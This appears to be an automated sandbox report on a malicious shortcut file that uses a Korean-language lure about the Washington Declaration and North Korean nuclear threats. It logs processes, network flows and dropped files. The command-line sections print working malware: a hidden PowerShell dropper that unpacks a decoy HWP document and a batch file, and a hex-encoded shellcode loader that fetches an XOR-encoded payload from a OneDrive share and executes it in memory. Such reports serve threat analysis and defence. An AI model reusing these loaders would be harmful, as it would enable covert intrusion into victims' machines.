Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 10, 2023, 9:13 a.m. | May 10, 2023, 9:15 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ySYsgYc" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk"
3012-
cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
2200-
powershell.exe powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
2220-
Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp"
2428-
HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
1704
-
-
-
cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
452-
powershell.exe powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
2548-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline"
2804-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES49D6.tmp" "c:\Users\test22\AppData\Local\Temp\CSC49C5.tmp"
2908
-
-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline"
2996-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES4BCA.tmp" "c:\Users\test22\AppData\Local\Temp\CSC4BB9.tmp"
1944
-
-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"
1784-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES4DED.tmp" "c:\Users\test22\AppData\Local\Temp\CSC4DDC.tmp"
156
-
-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline"
200-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES4FE1.tmp" "c:\Users\test22\AppData\Local\Temp\CSC4FD0.tmp"
1116
-
-
-
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
cacerts.digicert.com |
CNAME
fp2e7a.wpc.phicdn.net
|
152.195.38.76 |
api.onedrive.com |
CNAME
common-afdrk.fe.1drv.com
CNAME
l-0003.l-msedge.net
|
13.107.43.12 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49219 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49221 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49212 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49220 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49222 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49227 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49223 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49224 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49216 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
TLSv1 192.168.56.102:49230 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com | 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf |
request | GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt |
file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk |
file | c:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll |
file | c:\Users\test22\AppData\Local\Temp\mobuv0cw.dll |
file | c:\Users\test22\AppData\Local\Temp\owptouvz.dll |
file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk |
file | C:\Users\test22\AppData\Local\Temp\230509.bat |
file | c:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll |
file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk |
file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk |
cmdline | powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath; |
cmdline | powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};" |
cmdline | "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath; |
cmdline | c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};" |
file | C:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll |
file | C:\Users\test22\AppData\Local\Temp\owptouvz.dll |
file | C:\Users\test22\AppData\Local\Temp\mobuv0cw.dll |
file | C:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll |
Data received | G |
Data received | |
Data received | |
Data received | 0 |
Data received | êÿ þNqÝÈg4åpÞGäÿ»®ôµ¦xÕÌZêæ ïæ:¢DÑ |
Data received | Z0 u1ÌHÇÃgæÅþ£/Ér¯e&_zk2Ü`5¸}ªl#,ئD´PL$)áÜ |
Data received | ksô÷þoRáõô8µ<ågÀ0×Y@UÈÖëÊ·C¢Þ' ¡µtO [î |
Data received | ]¨¥ºU!а¶fá]©5¸³]{üt2!5ÕÊü¶zo¸ëªÎ| ßb¸ |
Data received | MdZáâB¤+º@@Èý«åâ.àà°DOWNGRD H hWC.?D æ Ô [»]ôÁsGçôÀ ÿ 00g 3 -äÃ÷¿$ÿ -0 *H÷ 0Y10 UUS10U Microsoft Corporation1*0(U!Microsoft Azure TLS Issuing CA 010 230310085426Z 240304085426Z0g10 UUS10 UWA10URedmond10U Microsoft Corporation10Ustorage.live.com0"0 *H÷ 0 °Xãwä½kó$V5ZÕÿYE&~Ã>^ÛÖëÈ´N~và¸ô"~3®y°Ø:±Ô«E@ð=+=Èt ÿïèûM§h¹çFÔqÕg¼§#¿Å7Ô1°å©¢mÕMÐúã¤ÐTÎ4¶Ã¾j鲩¿øæ)±cYËüV¡ºÌ¸æ'{îvÌLn\çÅâþ8Y)@u÷> Í¿ÿ$ìq38¿TVöǧÁA%A<·Ô´Î~ úÏæÜ 0ª±×Ë"CäÈa¯k*|eõÅYIU¡î¶jÍ3½Åí3Ì@B) £00,0 +Öyplj w îÍÐdÕÛÎÅ\·´Í¢2F|¼ìÞÃQHYFqµ ÊÃÊ] H0F! ª#2boÇj8-eDÚËyxÅù@¯iáÊ! ¯ §a?ù3îxØZQØ}Hs<xôfÍyæ w Ú¶¿k?µ¶"»\kèpql»Q 4½¤=0H×û« ÊÃÊv H0F! »ðuÛËíaíQ½ë @&h/z7 gÁU¯´b6Ê! Æúä>-b4b/m¬|ÃÐYóJ[â¶Í#&Âp v UÔÂ6JêW<SðÀä8xp%/£ªÓ ÊÃÊÉ G0E! ©ñ¶ö^Ã#FÏ*¨Z¬imM ¡ËSÓn .`µöeØÇ ä½7C0ªÚûsUõõ¡ê Å,mþ0' +7 00 +0 +0< +7/0-%+7½×çëF.ÐðÚ]åió§>d%0®+¡00m+0ahttp://www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2001%20-%20xsign.crt0-+0!http://oneocsp.microsoft.com/ocsp0Uÿâ {ÓXÐ7êÜÈx'Å[K0Uÿ°0AU804 l-df.live.net l.live.netapi.live.comapi.live.net docs.live.netskyapi.live.netapi-df.live.comapi-df.live.netdocs-df.live.netskyapi-df.live.net *.ra.live.com*.cobalt.df.storage.msn.com*.cobalt.df.storage.live.com*.cobalt.storage.msn.com*.df.storage.live.com*.df.storage.msn.com*.docs-df.live.net*.storage.live.com*.storage.msn.com*.users.df.storage.live.com*.users.df.storage.msn.com*.users.storage.live.com*.users.storage.msn.com*.df.policies.live.netdf.policies.live.net*.df.settings.live.netdf.settings.live.net*.df.livefilestore.com apis.live.net*.apis.live.net*.bay.livefilestore.com*.livefilestore.comssw.live-int.comssw.live.comdf.storage.live.com*.sn2.df.livefilestore.comstorage.live.com*.blu.livefilestore.com*.bn1.livefilestore.com*.cobalt.storage.live.com*.dm1.livefilestore.com*.docs.live.net*.policies.live.net*.settings.live.net*.sn2.livefilestore.com*.tuk.livefilestore.compolicies.live.netstorage.msn.comdev.live.comoauth.live.com*.bn1301.livefilestore.com*.bn1302.livefilestore.com*.dm2301.livefilestore.com*.dm2302.livefilestore.comskyapi.skydrive.live.comsettings.live.net*.bn1303.livefilestore.com*.bn1304.livefilestore.com*.dm2303.livefilestore.com*.dm2304.livefilestore.com*.by3301.livefilestore.com*.by3302.livefilestore.com*.snt002.df.livefilestore.com*.bn1303.df.livefilestore.com*.dm2303.df.livefilestore.comskyapi.newdrive.live.comskyapi.onedrive.live.com |
Data received | _ª6¶vàQ5¯£æóxBÍβE¬_$É8Jµ?sÞh®¸äþd¿s |
Data received | »ê½æÆ}?IYNÔ¥YaÀi&±~ SÁ6ì8 ö[ÇÄì£ßÞO|Ûï |
Data received | !2îêÉo@þ¢=óOÚõW;ûFðj|.Ù{A¹»ø²«ÚÔÇ.7¸çà |
Data received | ÜGàé>Ø2sZL2blsÂwoPÓµâ3À%¢² »ñ%|ºR |
